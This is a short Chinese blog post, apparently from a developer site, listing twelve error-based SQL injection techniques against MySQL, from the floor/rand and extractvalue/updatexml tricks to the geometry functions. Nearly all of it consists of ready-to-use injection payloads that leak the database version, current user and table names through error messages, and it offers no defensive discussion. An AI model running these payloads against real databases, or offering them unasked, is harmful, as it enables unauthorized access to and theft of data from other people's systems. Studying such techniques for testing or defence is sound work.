concat mysql sql注入_MySQL数据库的12种爆错注入

1.通过floor报错

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

339b0ee10da9685875ab56a4c832cb81.png

2.通过ExtractValue报错

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

f42794e08a5f245237afb811283078c8.png

3.通过UpdateXml报错

and 1=(updatexml(1,concat(0x3a,(select user())),1))

0f871f967ad995e5713d9099c83ac902.png

4.通过NAME_CONST报错

and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);

9a8df4babc75ebee69ad49af68258309.png

5.通过join报错爆字段

注:该方法在知道表名的情况下使用

select * from (select * from 表名 a join 表名 b) c)

在得到一个字段后,使用using得到下一个字段

select * from (select * from 表名 a join 表名 b using (已知的字段,已知的字段)) c

6c85ec4d3058e2ff57038a28904a2166.png

9dd2c37513933f535732d856a90a6319.png

9a100f95261fbf1cafefb5aafc43839d.png

6.通过exp报错

and exp(~(select * from (select user() ) a) );

ab56f3531d99fa724282f13ec3bb0628.png

注:由于MYSQL的版本问题,这种方法在我本地未重现成功,截图来自百度

7.通过GeometryCollection()报错

and geometrycollection((select * from(select * from(select user())a)b));

99c6b6b5388c807468b66587dee326b8.png

8.通过polygon()报错

and polygon((select * from(select * from(select user())a)b));

56314f12c983178db377078a00d66da9.png

9.通过multipoint()报错

and multipoint((select * from(select * from(select user())a)b));

24cbb7ac924fba43c3f4996bbf79b3fb.png

10.通过multlinestring()报错

and multilinestring((select * from(select * from(select user())a)b));

87a0adff782bb89558e2b914985b9e3c.png

11.通过multpolygon()报错

and multipolygon((select * from(select * from(select user())a)b));

6f8b4a0fcdf99761d52b53f29545f3d6.png

12.通过linestring()报错

and linestring((select * from(select * from(select user())a)b));

e36e912e92d124d1ec3a635b7e97e8bb.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值